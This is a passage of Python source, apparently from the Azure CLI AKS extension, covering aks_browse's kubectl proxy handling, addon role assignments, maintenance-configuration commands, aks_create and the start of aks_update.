result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
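# Summary of aks_browse above: for clusters on Kubernetes 1.19.0+ (or without the kube-dashboard
# addon) the Azure portal resources view is opened; otherwise kubectl proxy is started locally
# (or a cloud-shell port is opened) and the dashboard is reached through the proxy URL.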
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
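# Illustrative behaviour of _trim_nodepoolname above (names are placeholders):
#   _trim_nodepoolname('')                       -> 'nodepool1'
#   _trim_nodepoolname('averylongnodepoolname')  -> 'averylongnod'  (first 12 characters)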
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise CLIError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
os_sku=os_sku,
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_fips=enable_fips_image,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(
linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own '
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(
outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper,
aci_subnet_name,
vnet_subnet_id,
enable_secret_rotation
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise CLIError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError(
'"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
'kubeletidentity': ManagedClusterPropertiesIdentityProfileValue(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError(
'--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
_ensure_pod_identity_kubenet_consent(
network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile,
identity_profile=identity_profile,
disable_local_accounts=bool(disable_local_accounts))
if node_resource_group:
mc.node_resource_group = node_resource_group
use_custom_private_dns_zone = False
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError(
"Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError(
"Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise CLIError(private_dns_zone +
" is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise CLIError(
"--fqdn-subdomain should only be used for private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
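# Note on the retry loop at the end of aks_create above: creation is retried (up to max_retry
# attempts, sleeping 3 seconds between tries) only when the CloudError indicates the newly created
# service principal has not yet replicated to the AAD tenant ('not found in Active Directory
# tenant'); any other CloudError is re-raised immediately.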
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
not disable_local_accounts:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(
api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError(
'Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids/--enable-azure-rbac/--disable-azure-rbac"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
